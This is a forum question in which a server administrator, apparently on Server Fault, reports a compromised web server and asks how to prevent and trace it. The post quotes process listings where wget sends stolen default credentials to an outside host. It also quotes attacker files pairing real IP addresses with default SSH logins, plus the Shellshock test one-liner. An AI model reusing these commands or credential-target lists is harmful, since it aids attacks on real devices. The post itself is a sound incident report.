Server being hacked with lots of weird process

Question

(I have asked same question at https://superuser.com/questions/841908/server-being-hacked-with-lots-of-weird-process and was told better to ask here, could some admin help delete the post at superuser.com? Thanks.)

I was told by our IT that one of our servers has been hacked. There are a lot of process ran by www-data like:

www-data   300  0.0  0.0  30212  1892 ?        S    13:54   0:00 wget -O .tmp http://162.243.121.222/ppp.php?request=pi:raspberry:66.186.101.162
www-data   301  0.0  0.0  30212  1904 ?        S    14:11   0:00 wget -O .tmp http://162.243.121.222/ppp.php?request=admin:admin:66.36.202.41
www-data   302  0.0  0.0  30212  1896 ?        S    14:02   0:00 wget -O .tmp http://162.243.121.222/ppp.php?request=pi:raspberry:66.60.63.21
www-data   303  0.0  0.0  30212  1896 ?        S    14:07   0:00 wget -O .tmp http://162.243.121.222/ppp.php?request=admin:admin:66.207.51.193
www-data   304  0.0  0.0  30212  1896 ?        S    13:54   0:00 wget -O .tmp http://162.243.121.222/ppp.php?request=admin:admin:66.76.78.77

In the /tmp folder, there are weird files like:

-rw-r--r-- 1 www-data www-data     105 Nov 17 21:34 a
-rw-r--r-- 1 www-data www-data      56 Nov 17 21:34 A
drwxr-xr-x 2 www-data www-data    4096 Nov 18 13:16 .m/
-rw-r--r-- 1 www-data www-data 3891200 Nov 17 21:26 m.tar

And the contents of .m folder:

dli@ser2:/tmp/.m$ l
nobash.txt  pass.txt*  print*  pscan*  rand*  ssh2*  su*  t.log  vuln.txt

Part of nobash.txt

ubnt ubnt 66.0.5.106 22
ubnt ubnt 66.0.16.109 22
ubnt ubnt 66.0.21.146 22
ubnt ubnt 66.0.153.218 22
ubnt ubnt 66.0.108.178 22
ubnt ubnt 66.0.98.114 22
ubnt ubnt 66.0.75.34 22
ubnt ubnt 66.0.108.138 22
ubnt ubnt 66.0.216.155 22
ubnt ubnt 66.0.197.50 22
ubnt ubnt 66.0.171.194 22

Part of vuln.txt

Linux -> ubnt ubnt 66.8.234.101 22
Linux -> ubnt ubnt 66.27.64.22 22
Linux -> ubnt ubnt 66.61.43.61 22
Linux -> ubnt ubnt 66.66.26.165 22
Linux -> ubnt ubnt 66.94.178.113 22
Linux -> ubnt ubnt 66.129.37.62 22
Linux -> ubnt ubnt 66.146.254.112 22
Linux -> ubnt ubnt 66.147.115.66 22
Linux -> ubnt ubnt 66.169.84.19 22
Linux -> ubnt ubnt 66.205.223.146 22

Part of t.log

Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
Linux:->
ubnt:ubnt:66.0.5.106
ubnt:ubnt:66.0.16.109

I used last to see if there was any login history but found nothing. I also su to www-data user, but I could not find anything helpful.

Now I rebooted the server. What I want to ask is how to prevent this kind of thing from happening again? Is there a way to trace back to who is doing this?

Could this be caused by shellshock bash vulnerability:

dli@srv2:~$ env x='() { :;}; echo vulnerable' bash -c 'echo hello'
vulnerable
hello

Many thanks!

Server being hacked with lots of weird process

0 Answers0